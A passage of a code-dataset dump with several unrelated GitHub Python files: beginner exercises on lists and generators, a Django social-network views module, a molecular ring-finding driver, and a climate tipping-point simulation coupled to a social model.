до 240\" включает \"240\"\ngen_list = [el for el in range(20, 241) if (el % 20 == 0 or el % 21 == 0)]\nprint(gen_list)\n\n# Задание 4\n\ntest_freq = [2, 2, 2, 7, 23, 1, 44, 44, 3, 2, 10, 7, 4, 11]\nfreq_list = [el for el in test_freq if test_freq.count(el) == 1]\nprint(freq_list)\n\n# Задание 5\n\neven_range = [el for el in range(100, 1001) if el % 2 == 0]\nrange_product = 1\nfor i in even_range:\n range_product = range_product * i\nprint(range_product)\n\n# Задание 6\n\nfrom itertools import count, cycle\n\n# а)\n\nstart = int(input('input start number: '))\nstop = int(input('input final number: '))\nfor el in count(start):\n if el > stop:\n break\n else:\n print(el)\n\n# б)\n\ni = 0\namount = int(input('input amount of iterations: '))\niterable_list = [1, 2, 3, 4, 5, 6, 7]\nfor el in cycle(iterable_list):\n if i >= amount:\n break\n print(el)\n i += 1\n \n# Задание 7\n\n\ndef fact(n):\n result = 1\n for i in range(1, n+1):\n result *= i\n yield result\n\n\nuser_fact = int(input('input number for calculating factorial: '))\nfor number in fact(user_fact):\n print(f'!{user_fact} = {number}')\n","repo_name":"stanwarp/gb_study","sub_path":"py_bas/lesson4.py","file_name":"lesson4.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38411000884","text":"from json.encoder import JSONEncoder\nfrom django.shortcuts import render\n\nfrom social_site.views import Login\nfrom .models import Post, Profile, Comments\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom 
.forms import PostForm, EditForm\nfrom profiles.models import Profile\n# Create your views here.\n\n\n@login_required(login_url='login')\ndef index(request):\n form = PostForm\n editForm = EditForm(auto_id=\"edit_%s\")\n return render(request, 'posts/main.html', {'form': form, 'editForm': editForm})\n\ndef editSave(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n postContent = request.POST.get('content')\n post.content = postContent\n post.save()\n return JsonResponse({})\n\ndef deletePost(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n postJSON = {\n 'id': post.id\n }\n post.delete()\n return JsonResponse({'post': postJSON})\n\ndef editPost(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n if post.image:\n postImage = post.image.url\n else:\n postImage = \"\"\n postJSON = {\n 'id': post.id,\n 'author': post.author.id,\n 'count': post.likeCount,\n 'content': post.content,\n 'postImage': postImage\n }\n \n return JsonResponse({'post': postJSON})\n else:\n return JsonResponse({'message':\"DONT TOUCH, YOU DONT OWN THIS!\"})\n\ndef postControl(request):\n if request.is_ajax():\n postImage = request.FILES.get('postedImage')\n postContent = request.POST.get('postContent')\n\n if postContent != '' or postImage != None:\n postCreator = Profile.objects.get(user=request.user)\n newPost = Post()\n newPost.image = postImage\n newPost.author = postCreator\n newPost.content = postContent\n newPost.save()\n if (postImage != None):\n postImageURL = newPost.image.url\n\n else:\n postImageURL = '/'\n newPostJSON = {\n 'id': newPost.id,\n 'author': newPost.author.id,\n 'content': newPost.content,\n 'count': newPost.likeCount,\n 'postImage': postImageURL,\n }\n newPostAuthorJSON = {\n 'name': postCreator.firstName + \" \" + postCreator.lastName,\n 'profilePic': str(postCreator.profilePic.url),\n 'firstName': postCreator.firstName,\n 'lastName': postCreator.lastName\n }\n return JsonResponse({'post': newPostJSON, 'author': newPostAuthorJSON})\n\n\ndef loadData(request):\n currentUser = request.user\n currentUserProfile = Profile.objects.get(user=currentUser)\n currentUserFriends = currentUserProfile.friends.all()\n\n friendsJSON = []\n for frnd in currentUserFriends:\n friendOBJ = Profile.objects.get(id=frnd.id)\n friend = {\n 'id': friendOBJ.id,\n 'firstName': friendOBJ.firstName,\n 'lastName': friendOBJ.lastName,\n }\n friendsJSON.append(friend)\n\n allComments = Comments.objects.all().order_by('-created')\n allCommentsListJSON = []\n for comment in allComments:\n com = {\n 'id': comment.id,\n 'comment': comment.comment,\n 'post': comment.post.id,\n 'commenter': comment.commenter.id,\n 'name': comment.commenter.firstName + \" \" + comment.commenter.lastName,\n 'profilePic': str(comment.commenter.profilePic.url)\n }\n allCommentsListJSON.append(com)\n\n allPosts = Post.objects.all().order_by('-created')\n allPostListJSON = []\n for post in allPosts:\n full_name = post.author.firstName + \" \" + post.author.lastName\n if (post.image):\n postImage = str(post.image.url)\n else:\n postImage = ''\n item = {\n 'id': post.id,\n 'content': post.content,\n 'author': post.author.user.id,\n 'authorFirstName': post.author.firstName,\n 'authorLastName': post.author.lastName,\n 'profilePic': str(post.author.profilePic.url),\n 'liked': True if request.user in post.liked.all() else False,\n 
'count': post.likeCount,\n            'name': full_name,\n            'created': post.created,\n            'postImage': postImage\n        }\n        allPostListJSON.append(item)\n    currentUserProfileJSON = {\n        'id': currentUserProfile.id,\n        'firstName': currentUserProfile.firstName,\n        'lastName': currentUserProfile.lastName,\n        'profilePic': str(currentUserProfile.profilePic.url)\n    }\n    return JsonResponse({'currentUser': currentUserProfileJSON, 'allPosts': allPostListJSON, 'friends': friendsJSON, 'comments': allCommentsListJSON})\n\n\ndef likeControl(request):\n    if request.is_ajax():\n        pk = request.POST.get('pk')\n        post = Post.objects.get(id=pk)\n        if request.user in post.liked.all():\n            liked = False\n            post.liked.remove(request.user)\n        else:\n            liked = True\n            post.liked.add(request.user)\n        return JsonResponse({'liked': liked, 'count': post.likeCount})\n\n\ndef commentControl(request):\n    if request.is_ajax():\n        pk = request.POST.get('pk')\n        allComments = Comments.objects.all().order_by('created')\n        post = Post.objects.get(id=pk)\n        comment = Comments()\n        comment.post = post\n        comment.commenter = Profile.objects.get(user=request.user)\n        commenterFullName = comment.commenter.firstName + \" \" + comment.commenter.lastName\n        comment.comment = request.POST.get('comment')\n        commentList = []\n        for comments in allComments:\n            commentOBJ = Comments.objects.get(id=comments.id)\n            com = {\n                'id': commentOBJ.id,\n                'comment': commentOBJ.comment,\n                'post': commentOBJ.post.id,\n                'commenter': commentOBJ.commenter.user.id,\n                'profilePic': str(commentOBJ.commenter.profilePic.url)\n            }\n            commentList.append(com)\n        if comment.comment != '':\n            comment.save()\n        return JsonResponse({'commentList': commentList, 'id': comment.id, 'comment': str(comment.comment), 'commenter': commenterFullName, 'profilePic': str(comment.commenter.profilePic.url)})\n","repo_name":"michael-rohweder/social.me","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74096857431","text":"\nlist1 = []\nlist2 = [1, 56, \"s\", 34, 2.34, [\"s\", 2, 3, 4, 5, 6, \"Hello\"]]\nprint(list2)\n\na = [a + b for a in 'list' if a != 's' for b in 'soup' if b != 'u']\nprint(a)\n\nlist1.append(23)\nlist1.append(34)\nlist1.insert(0, 34)\nb = [24, 67]\nlist1.extend(b) # add the elements of list b to the end of list1\n# index, what to put in\nlist1.insert(2, 1988) # insert into the list, specifying the position first and then the value\nlist1.remove(34) # removes only the first such element 34\nlist1.pop(0) # removes the i-th element, i.e. removes by index; with no argument it removes the last one\nprint(list1.index(24)) # print the index of an element in the list\nprint(list1.count(34)) # prints how many of the given element are in the list; we passed 34 and the list has 1 such element\n\nlist1.sort() # sorts the list in ascending order\nprint(list1)\n\nlist1.reverse() # reverses the list\nprint(list1)\n\nlist1.clear() # clears the list\n\nprint(\"-----------END-------------\")\n\n\n\n\n\n","repo_name":"kolasau/Lessons","sub_path":"Lesson_7_Lists.py","file_name":"Lesson_7_Lists.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71344717593","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 27 20:40:39 2018\r\n\r\ncontrols the force_field_code and ringalgothem to automatically process molecules\r\nfor MD simulations.\r\n\r\n@author: Craig Melton\r\n\"\"\"\r\n\r\nfrom 
mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.pyplot as plt\r\nimport time as t\r\n\r\nimport expected_ring_number as EV\r\nimport force_field_code_final as MD\r\nimport ringalgothem_final_2 as ring\r\n#import numpy as np\r\n\r\n#pdb reader\r\n\r\n#def ring_number_lists(molecule,Residue_number=[],Residue=[]):\r\n# \"\"\"creates lists for ringfinder number for each Residue\"\"\"\r\n# \r\n# if len(Residue_number) < 1:\r\n# Residue = []\r\n# for atom in molecule.atoms:\r\n# Residue.append(atom.pdb[22:26])\r\n# Residue = list(set(Residue))\r\n# \r\n# for res_mun in Residue:\r\n# Residue_number.append((res_mun,[]))\r\n## print(Residue, ' ', Residue_number)\r\n# else:\r\n# for atom in molecule.atoms:\r\n# for res_mun in Residue_number:\r\n# if atom.pdb[22:26] == res_mun[0]:\r\n# if len(res_mun[1]) < 1:\r\n# res_mun[1].append((atom.ID,[atom.ringfinder]))\r\n# else:\r\n# if res_mun[0] == atom.ID:\r\n# res_mun[1][1].append(atom.ringfinder)\r\n# \r\n# \r\n# return Residue_number, Residue\r\n \r\n\r\n \r\n# main function\r\n\r\ndef Main(file):#amino_acids):\r\n \"\"\"This function brings together the force_field_code and ringalgorithm scripts \r\n to fully automatedly processor molecule for molecular dynamics simulations \"\"\"\r\n \r\n cycle_times =[]\r\n chainremovials =[]\r\n groupcreations =[]\r\n group_setups =[]\r\n ring_finding_times =[]\r\n times_lists = [cycle_times,chainremovials,groupcreations,group_setups,ring_finding_times]\r\n group_nums =[]\r\n \r\n start = t.time()\r\n t1 = start\r\n last_time = t1\r\n \r\n \r\n \r\n \r\n molecule, n = MD.read_in_molecule_data_pdb(file)\r\n \r\n print('atoms # {}'.format(len(molecule.atoms)))\r\n print('timeout time {}'.format((60*2 + 60*(len(molecule.atoms)/1000)**2)))\r\n \r\n bonds, errors = molecule.connectivity(n)\r\n# molecule.Hydrogen_duplite_remove()\r\n \r\n molecule.non_H_connections_num()\r\n molecule.Extendedconnections()\r\n \r\n \r\n \r\n t2 = t.time()\r\n connectivity_time = t2 - last_time\r\n last_time = t2\r\n \r\n \r\n print(connectivity_time)\r\n \r\n ring.connections_num(molecule)\r\n \r\n# Residue_number, Residue = ring_number_lists(molecule)\r\n \r\n \r\n groups = []\r\n \r\n error_list = []\r\n\r\n groups_lists = []\r\n \r\n non_zero = []\r\n for atom1 in molecule.atoms:\r\n if atom1.ringfinder > 0:\r\n non_zero.append(atom1)\r\n ring.carbonyl_groups(molecule)\r\n j = 0\r\n \r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n \r\n \r\n \r\n t3 = t.time() \r\n ringsetup = t3 - last_time\r\n last_time = t3\r\n \r\n \r\n while len(non_zero) > 0 :\r\n print(len(non_zero))\r\n cycle_start = t.time()\r\n last_time = cycle_start\r\n \r\n ring.chain_end(molecule)\r\n \r\n pesent_time = t.time()\r\n chainremovial = pesent_time - last_time\r\n times_lists[1].append(chainremovial)\r\n last_time = pesent_time\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n \r\n \r\n molecule.group_list, groupnum = ring.homogesis_atom_connections(molecule)\r\n group_nums.append(groupnum)\r\n \r\n pesent_time = t.time()\r\n groupcreation = pesent_time - last_time\r\n times_lists[2].append(groupcreation)\r\n last_time = pesent_time\r\n \r\n atoms_2 = []\r\n for atom in molecule.atoms:\r\n if atom.ringfinder == 0:\r\n atoms_2.append(atom)\r\n molecule.group_list.append(ring.group(atoms_2, -1))\r\n \r\n groups_lists.append(molecule.group_list)\r\n \r\n \r\n \r\n ring.atom_groups(molecule.group_list)\r\n \r\n \r\n ring.group_linkers(molecule.group_list)\r\n \r\n 
pesent_time = t.time()\r\n group_setup = pesent_time - last_time \r\n times_lists[3].append(group_setup)\r\n last_time = pesent_time\r\n\r\n error = ring.group_seach(molecule)\r\n \r\n pesent_time = t.time()\r\n ring_finding_time = pesent_time - last_time \r\n times_lists[4].append(ring_finding_time)\r\n last_time = pesent_time\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n molecule.ring_cycles += 1\r\n \r\n cycle_finish = t.time()\r\n cycle_time = cycle_finish - cycle_start\r\n times_lists[0].append(cycle_time)\r\n last_time = cycle_finish\r\n \r\n if error == 'Failed_to_converage':\r\n t4 = t.time()\r\n ring_time = t4-t3\r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n \r\n finish = t.time()\r\n total_time = finish - start\r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'Failed_to_converage',ringsetup,times_lists,group_nums)\r\n\r\n non_zero = []\r\n for atom1 in molecule.atoms:\r\n if atom1.ringfinder > 0:\r\n non_zero.append(atom1)\r\n \r\n\r\n# for atom1 in atoms:\r\n# for bond2 in atom1.connectivity:\r\n# for atom3 in bond2.atoms:\r\n# atoms.append(atom3)\r\n# atoms = list(set(atoms))\r\n \r\n \r\n \r\n \r\n t4 = t.time()\r\n ring_time = t4-t3\r\n if molecule.group_list != groups:\r\n groups = molecule.group_list\r\n else:\r\n j += 1\r\n if j == 2:\r\n print('shorter limit used')\r\n for group in molecule.group_list:\r\n if group.valence > 0:\r\n for atom in group.atoms:\r\n# if atom.symbol in ['C', 'N', 'O']:\r\n for bond in atom.connectivity:\r\n# if bond[1].symbol in ['C', 'N', 'O']:\r\n if bond[0] >= 2.00: \r\n if bond[1].symbol != 'H': \r\n atom.ringfinder -= 1\r\n \r\n# for atom in molecule.atoms:\r\n# for bond in atom.connectivity:\r\n# if bond[1].ringfinder > 0:\r\n# atom.ringfinder2 += 1\r\n# \r\n# for atom in molecule.atoms:\r\n# if atom.symbol != 'H':\r\n# atom.ringfinder = atom.ringfinder2\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n if j == 6:\r\n# print('Failed_to_converage\\n')\r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n \r\n finish = t.time()\r\n total_time = finish - start\r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'Failed_to_converage',ringsetup,times_lists,group_nums)\r\n print('current_ring_time {}'.format(t4-t3)) \r\n# if t4-t3 > (60*2 + 60*(len(molecule.atoms)/1000)**2):\r\n# print(t4-t3)\r\n## print(\"timed out error\")\r\n# error_list.append((t4-t3,\"timed out error\"))\r\n# molecule.metal_connections()\r\n# MD.bond_hack(molecule)\r\n# \r\n## timeout = ring.count_non_zeroatoms(molecule)\r\n# finish = t.time()\r\n# total_time = finish - start \r\n# return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'TimeoutError')\r\n \r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n try:\r\n ring_time = t4-t3\r\n except UnboundLocalError:\r\n t4 = t.time()\r\n ring_time = t4-t3\r\n finish = t.time()\r\n total_time = finish - start \r\n \r\n \r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'succefull_convergation',ringsetup,times_lists,group_nums) 
#(molecule, groups_lists)\r\n\r\n\r\n\r\ngrouptype = {2: 'b', 1: 'r', 3: 'g', 0: 'w', 4: 'y', 5:'m'}\r\n\r\ndef main(molecule, groups_list):\r\n    \"\"\"constructs the connectivity graph\"\"\"\r\n    for group_list in groups_list:\r\n        plt.style.use('dark_background')\r\n        fig = plt.figure()\r\n        ax = fig.add_subplot(111, projection='3d')\r\n        \r\n        \r\n        for group in group_list:\r\n            colour = grouptype[group.valence]\r\n            for atom in group.atoms:\r\n                x = atom.position[0]\r\n                y = atom.position[1]\r\n                z = atom.position[2]\r\n        \r\n                ax.scatter(x, y, z, c=colour ,marker='o')\r\n        \r\n        \r\n        \r\n        for bond in list(molecule.bonds):\r\n            try:\r\n                x1 = bond.atoms[0].position[0]\r\n                y1 = bond.atoms[0].position[1]\r\n                z1 = bond.atoms[0].position[2]\r\n                x2 = bond.atoms[1].position[0]\r\n                y2 = bond.atoms[1].position[1]\r\n                z2 = bond.atoms[1].position[2]\r\n                ax.plot([x1,x2], [y1,y2], [z1,z2], 'w-')\r\n    #        if bond.atom[0].symbol == bond.atom[1].symbol:\r\n    #            color = atomtype[bond.atom[0].symbol] + '-'\r\n    #            ax.plot([x1,x2], [y1,y2], [z1,z2], color)\r\n    #        else:\r\n    #            color1 = atomtype[bond.atom[0].symbol] + '-'\r\n    #            color2 = atomtype[bond.atom[1].symbol] + '-'\r\n    #            ax.plot([x1,(x2-x1)/2], [y1,(y2-y1)/2], [z1,(z2-z1)/2], color1)\r\n    #            ax.plot([(x2-x1)/2,x2], [(y2-y1)/2,y2], [(z2-z1)/2,z2], color2)\r\n            except AttributeError:\r\n                continue\r\n    ax.set_xlabel('x')\r\n    ax.set_ylabel('y')\r\n    ax.set_zlabel('z')\r\n    \r\n    \r\n    plt.show()\r\n    return None\r\n\r\n#Asn-Gln-Leu-Pro-Tyr2.xyz\r\n# new_tests1.xyz\r\n# test2.xyz\r\n#test1 = Main('Asn-Gln-Leu-Pro-Tyr2.pdb')\r\n#\r\n#main(test1, group)\r\n\r\n\r\n\r\ndef group_brakedown(group_list):\r\n    \"\"\"takes the groups from a molecule and then returns a dictionary with the \r\n    number of each group type present\"\"\"\r\n    group_types = {}\r\n    for group1 in group_list:\r\n        group_types[(group1.size,group1.valence)] = 1 + group_types.get((group1.size,group1.valence), 0)\r\n    return group_types\r\n\r\n\r\n\r\ndef bond_brakedown(atoms):\r\n    \"\"\"counts how many bonds of each element pair are present\"\"\"\r\n    bond_types = {}\r\n    for i, atom1 in enumerate(atoms):\r\n        # connectivity entries are (value, atom) pairs, as used in Main() above\r\n        for bond1 in atom1.connectivity:\r\n            atom2 = bond1[1]\r\n            if atom2 in atoms[i + 1:]:\r\n                symbols = sorted([atom1.symbol, atom2.symbol])\r\n                bond = '{}-{}'.format(symbols[0], symbols[1])\r\n                bond_types[bond] = 1 + bond_types.get(bond, 0)\r\n    return bond_types\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"craig260/connectivity-ringfinding-algorithm","sub_path":"MD_main_final_2.py","file_name":"MD_main_final_2.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"28783714155","text":"# Add modules directory to path\nimport os\nimport sys\n\nsys.path.append('')\n\n# global imports\nimport numpy as np\nimport matplotlib\n#matplotlib.use(\"Agg\")\nmatplotlib.use( 'tkagg' )\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(font_scale=1.)\nimport itertools\nimport time\nimport glob\nfrom PyPDF2 import PdfFileMerger\nimport tkinter\n\n# private imports from sys.path \nfrom core.evolve import evolve\n\n#private imports for earth system\nfrom earth_sys.timing_no_enso import timing\nfrom earth_sys.functions_earth_system_no_enso import global_functions\nfrom earth_sys.earth_no_enso import earth_system\n\n#private imports from Saverio's model\nfrom earth_sys.nzmodel import nzmodel\nfrom gran_wied.gwmodel import gwmodel\n\n\n#for cluster computations\nos.chdir(\"/Users/jasminezhang/Documents/PIK22\")\n\n#measure time\n#start = 
time.time()\n#############################GLOBAL SWITCHES#########################################\ntime_scale = True # time scale of tipping is incorporated\nplus_minus_include = True # from Kriegler, 2009: Unclear links; if False all unclear links are set to off state and only network \"0-0\" is computed\nswitch_unc = True # if uncertainty is taken into account at all\nswitch_unc_barrett = False # is there an uncertainty in the thresholds, which lowers the ability to cooperate (following Barrett et al., Nature Climate Change, 2014)\n######################################################################\n\n\n# switch_unc_barrett cannot be True in case switch_unc is False\nif switch_unc == False:\n if switch_unc_barrett == True:\n print(\"Switch_unc_barrett cannot be True in case switch_unc is False - Please check !!!\")\n print(\"The percevied uncertainty (Barrett) does not make sense if overall uncertainty about threshold is zero\")\n quit()\n\n## temperature uncertainty that has to be taken into account\nunc_temp = np.array([[0.8, 3.0], [1.4, 8.0], [1.0, 3.0], [2.0, 6.0]]) #limit of critical temperature thresholds of GIS, THC, WAIS, AMAZ\n\n\n#actual real simulation years\nduration = 6000 \n# previously 50000\n\n\n#Names to create the respective directories\nnamefile = \"no\"\nif switch_unc_barrett == False and switch_unc == True:\n long_save_name = \"results_degreeChanges\"\nelif switch_unc_barrett == True and switch_unc == True:\n long_save_name = \"results_barrett_3\"\nelif switch_unc_barrett == False and switch_unc == False:\n long_save_name = \"results_no_uncertainty_3\"\n print(\"We don't want to compute this at the moment!\")\n quit()\nelse:\n print(\"Check switches of uncertainty\")\n quit()\n\n#######################GLOBAL VARIABLES##############################\n#drive coupling strength\ncoupling_strength = np.linspace(0.0, 1.0, 6, endpoint=True)\n# previusly 11\n\n########################Declaration of variables from passed values#######################\n#Must sort out first value since this is the actual file \nsys_var = np.array(sys.argv[1:], dtype=str) #low sample -3, intermediate sample: -2, high sample: -1\n#####################################################################\n\n\n#Tipping ranges from distribution\nlimits_gis, limits_thc, limits_wais, limits_amaz, limits_nino = float(sys_var[0]), float(sys_var[1]), float(sys_var[2]), float(sys_var[3]), float(sys_var[4])\n\n#Probability fractions\n# TO GIS\npf_wais_to_gis, pf_thc_to_gis = float(sys_var[5]), float(sys_var[6])\n# TO THC\npf_gis_to_thc, pf_nino_to_thc, pf_wais_to_thc = float(sys_var[7]), float(sys_var[8]), float(sys_var[9])\n# TO WAIS\npf_nino_to_wais, pf_thc_to_wais, pf_gis_to_wais = float(sys_var[10]), float(sys_var[11]), float(sys_var[12])\n# TO NINO\npf_thc_to_nino, pf_amaz_to_nino = float(sys_var[13]), float(sys_var[14])\n# TO AMAZ\npf_nino_to_amaz, pf_thc_to_amaz = float(sys_var[15]), float(sys_var[16])\n\n#tipping time scales\ntau_gis, tau_thc, tau_wais, tau_nino, tau_amaz = float(sys_var[17]), float(sys_var[18]), float(sys_var[19]), float(sys_var[20]), float(sys_var[21])\n\n\n\n#Time scale\n\"\"\"\nAll tipping times are computed ion comparison to the Amazon rainforest tipping time. 
As this is variable now, this affects the results to a (very) level\n\"\"\"\nif time_scale == True:\n print(\"compute calibration timescale\")\n #function call for absolute timing and time conversion\n time_props = timing(tau_gis, tau_thc, tau_wais, tau_amaz, tau_nino)\n gis_time, thc_time, wais_time, nino_time, amaz_time = time_props.timescales()\n conv_fac_gis = time_props.conversion()\nelse:\n #no time scales included\n gis_time = thc_time = wais_time = nino_time = amaz_time = 1.0\n conv_fac_gis = 1.0\n\n#include uncertain \"+-\" links:\nif plus_minus_include == True:\n plus_minus_links = np.array(list(itertools.product([-1.0, 0.0, 1.0], repeat=3)))\n\n #in the NO_ENSO case (i.e., the second link must be 0.0)\n plus_minus_data = []\n for pm in plus_minus_links:\n if pm[1] == 0.0:\n plus_minus_data.append(pm)\n plus_minus_links = np.array(plus_minus_data)\n\nelse:\n plus_minus_links = [np.array([1., 1., 1.])]\n\n\n#directories for the Monte Carlo simulation\n#mc_dir = int(sys_var[-1])\nmc_dir = 0\n\n\n################################# MAIN #################################\n#Create Earth System\nearth_system = earth_system(gis_time, thc_time, wais_time, nino_time, amaz_time,\n limits_gis, limits_thc, limits_wais, limits_nino, limits_amaz,\n pf_wais_to_gis, pf_thc_to_gis, pf_gis_to_thc, pf_nino_to_thc,\n pf_wais_to_thc, pf_gis_to_wais, pf_thc_to_wais, pf_nino_to_wais,\n pf_thc_to_nino, pf_amaz_to_nino, pf_nino_to_amaz, pf_thc_to_amaz)\n\n#####Variables to be set\n#Create Social Model\n\nthreshold_frac = 0.5\n#avg_degree = 10\na = 0.14\nets = 0.5\nc = 0.6\ntr = 0.01\n\n\n################################# MAIN LOOP #################################\n#for kk in plus_minus_links:\nfinalTemp = []\nfinalTipped = []\nfinalActive = []\nfinalTimes = []\n\nkk = [-1,0,-1]\n#EnvToSocCoupling = np.linspace(0.0, 1, 21, endpoint=True)\n#degrees = np.linspace(5, 15, 11, endpoint=True)\ndegrees = [3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 18, 20, 30, 40, 50]\n\nfor avg_degree in degrees:\n allTipped = False\n\n #print(\"Wais to Thc:{}\".format(kk[0]))\n #print(\"Amaz to Nino:{}\".format(kk[1]))\n #print(\"Thc to Amaz:{}\".format(kk[2]))\n try:\n os.stat(\"{}\".format(long_save_name))\n except:\n os.makedirs(\"{}\".format(long_save_name))\n\n try:\n os.stat(\"{}/{}_feedbacks\".format(long_save_name, namefile))\n except:\n os.mkdir(\"{}/{}_feedbacks\".format(long_save_name, namefile))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}\".format(long_save_name, namefile, a, c))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}\".format(long_save_name, namefile, a, c))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n\n #save starting conditions\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/empirical_values_care{}_{}.txt\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2], a, c), sys_var, delimiter=\" \", fmt=\"%s\")\n\n\n \n times = []\n\n #for strength in coupling_strength:\n strength = 0.2\n #print(\"Coupling strength: {:.2f}\".format(strength))\n\n print(\"degree: \", avg_degree)\n\n \n # if 
os.path.isfile(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.3f}.txt\".format(long_save_name, \n    #         namefile, ets, c, kk[0], kk[1], kk[2], ets, c, strength, ets)) == True:\n    #     print(\"File already computed\")\n    #     continue\n\n    tippedElements = 0\n    granTipped = False\n    output = []\n    gmt = [0]\n    # roots = np.empty((duration,3,))\n    # roots[:] = np.nan\n    first = True\n    firstRoot = []\n    numTipped = []\n    closeGis, closeThc, closeWais, closeAmaz = -1.0, -1.0, -1.0, -1.0\n\n    for t in range(2, int(duration)+2):\n        \n\n        ######THE SOCIAL MODEL\n        #model = gwmodel(threshold_frac,avg_degree,a+tippedElements*0.05,c-tippedElements*0.05)\n\n        # take the negative ones (not yet tipped) between -1 and 0\n        # only care about specific value for negatives (cuz that's how close)\n        # the smaller the number the better\n        changeGis = min(closeGis, 0)\n        changeThc = min(closeThc, 0)\n        changeWais = min(closeWais, 0)\n        changeAmaz = min(closeAmaz, 0)\n        totalChange = changeGis + changeThc + changeWais + changeAmaz + 4 # total change is positive, 0 to 4\n        totalChange = totalChange / 4 * c * ets\n\n        model = gwmodel(threshold_frac,avg_degree, a+totalChange, c-totalChange)\n        ###END SOCIAL MODEL\n\n        ######THE NATURAL MODEL\n        effective_GMT = gmt[-1]\n\n        #get back the network of the Earth system\n        net = earth_system.earth_network(effective_GMT, strength, kk[0], kk[1], kk[2])\n\n        # initialize state\n        if t == 2:\n            initial_state = [-1, -1, -1, -1] #initial state\n        else:\n            initial_state = [ev.get_timeseries()[1][-1, 0], ev.get_timeseries()[1][-1, 1], ev.get_timeseries()[1][-1, 2], ev.get_timeseries()[1][-1, 3]]\n        ev = evolve(net, initial_state)\n        # plotter.network(net)\n\n        # Timestep for integration; it is also possible to run integration until equilibrium\n        timestep = 0.1\n\n        #t_end given in years; also possible to use equilibrate method\n        t_end = 1.0/conv_fac_gis #simulation length in \"real\" years, in this case 1 year\n        ev.integrate(timestep, t_end)\n        #######END: THE NATURAL MODEL\n\n        tippedElements = net.get_number_tipped(ev.get_timeseries()[1][-1])\n        closeGis = ev.get_timeseries()[1][-1, 0]\n        closeThc = ev.get_timeseries()[1][-1, 1]\n        closeWais = ev.get_timeseries()[1][-1, 2]\n        closeAmaz = ev.get_timeseries()[1][-1, 3]\n\n        if((not allTipped) and tippedElements==4):\n            finalTimes.append(t-1)\n            allTipped = True\n\n        if t==2:\n            root_x, root_y = model.guess(a)\n        else:\n            root_x, root_y = model.guess(firstRoot[-1])\n\n        activeShare = float(root_x[0])\n        firstRoot.append(activeShare)\n        numTipped.append(tippedElements / 4)\n\n        lastTemp = float(gmt[-1])\n        # stop the temperature from increasing forever\n        if(activeShare > (a+c-0.05)):\n            activeShare = 1 # in the future can make >1\n            #newTemp = float(lastTemp - 0.0005)\n        #else:\n        newTemp = float(lastTemp + (1 - activeShare) * tr) # vary this 0.01 from 0.005 to 0.05\n        #print(newTemp,\" \",type(newTemp))\n        gmt.append(newTemp)\n\n        if(len(root_x)==1):\n            granTipped = True\n            # unclear but sometimes list sometimes scalar\n            if(isinstance(root_x, list)):\n                root_x = root_x[0]\n            #roots[t-2][0] = float(root_x) # used to be root_x[0]\n            if(first):\n                times.append(t-2)\n                first = False\n        #else:\n            #roots[t-2] = root_x\n\n        #saving structure\n        output.append([t,\n                       ev.get_timeseries()[1][-1, 0],\n                       ev.get_timeseries()[1][-1, 1],\n                       ev.get_timeseries()[1][-1, 2],\n                       